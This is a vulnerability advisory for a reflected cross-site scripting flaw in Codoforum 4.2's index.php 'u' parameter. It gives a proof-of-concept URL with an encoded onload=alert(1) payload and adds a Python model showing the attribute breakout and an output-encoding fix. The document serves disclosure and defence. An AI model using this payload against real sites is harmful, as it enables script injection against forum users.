========================================================================
| # Title : codoforum 4.2 XSS vulnerability (reflected)
| # Author : Mohamed diaa
| # email : moha200@protonmail.com
| # Tested on : chrome - windows 7
| # Version : 4.2
| # Vendor : https://codoforum.com/
========================================================================
Request Method(s):
[+] GET
Vulnerable Function(s):
[+] index.php
Vulnerable Parameter(s):
[+] u
Proof of Concept (PoC):
========================
Cross-Site Scripting, also known as XSS, is one of the most common attacks against web applications.
XSS works by manipulating the client-side scripts of a web application so that they perform actions planned by a malicious user.
Reflected Cross-Site Scripting occurs when data sent by the attacker to the application is displayed on the page directly, without being stored anywhere.
[+] http://location/codoforum/index.php?u=%2fnaf3r%22%20onload%3dalert(1)%20vdkyo
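
Added example (not part of the original advisory and not Codoforum's own code): a Python model of why the decoded value of u breaks out of a double-quoted HTML attribute, and how attribute encoding on output keeps it as plain data. The template and all function names are assumptions, since the advisory does not show where index.php reflects u.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# PoC URL copied verbatim from the advisory.
POC_URL = ("http://location/codoforum/index.php"
           "?u=%2fnaf3r%22%20onload%3dalert(1)%20vdkyo")

# Assumption: the advisory does not show the sink, so this constructed
# template stands in for "u is echoed inside a double-quoted attribute".
TEMPLATE = '<body data-u="{u}">'

def get_u(url):
    """Return the URL-decoded value of the `u` query parameter."""
    return parse_qs(urlsplit(url).query)["u"][0]

def render_unsafe(u):
    """Reflect u as-is: a double quote in u closes the attribute early."""
    return TEMPLATE.format(u=u)

def render_safe(u):
    """Reflect u with HTML attribute encoding (" becomes &quot;)."""
    return TEMPLATE.format(u=html.escape(u, quote=True))

class _AttrCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.attrs = {}
    def handle_starttag(self, tag, attrs):
        self.attrs.update(attrs)

def parsed_attrs(markup):
    """Attributes an HTML parser sees on the rendered tag."""
    collector = _AttrCollector()
    collector.feed(markup)
    collector.close()
    return collector.attrs

def has_event_handler(markup):
    """True if any parsed attribute is an on* event handler."""
    return any(name.startswith("on") for name in parsed_attrs(markup))
```

The same has_event_handler check can serve as a regression test: request the page with a quote-bearing u value and assert that the response tag carries no on* attribute.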